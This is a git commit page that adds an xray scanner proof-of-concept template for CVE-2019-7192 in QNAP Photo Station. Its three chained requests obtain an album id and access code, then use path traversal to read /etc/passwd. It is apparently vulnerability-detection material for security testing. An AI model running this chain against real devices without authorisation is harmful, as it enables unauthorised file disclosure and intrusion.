优化xray解析模块,支持groups、新增poc

This commit is contained in:
影舞者
2021-11-16 14:42:35 +08:00
parent 858c28724b
commit b06d7ac94c
313 changed files with 4314 additions and 760 deletions
+28
View File
@@ -0,0 +1,28 @@
name: poc-yaml-qnap-cve-2019-7192
rules:
- method: POST
path: /photo/p/api/album.php
headers:
Content-Type: application/x-www-form-urlencoded
body: a=setSlideshow&f=qsamplealbum
expression: |
response.status == 200
search: >-
<output>(?P<album_id>.*?)</output>
- method: GET
path: /photo/slideshow.php?album={{album_id}}
expression: |
response.status == 200
search: >-
encodeURIComponent\(\'(?P<access_code>.*?)\'\)
- method: POST
path: /photo/p/api/video.php
headers:
Content-Type: application/x-www-form-urlencoded
body: album={{album_id}}&a=caption&ac={{access_code}}&f=UMGObv&filename=./../../../../../etc/passwd
expression: |
response.status == 200 && response.body.bcontains(b"admin:x:0:0")
detail:
author: Hzllaga
links:
- https://github.com/th3gundy/CVE-2019-7192_QNAP_Exploit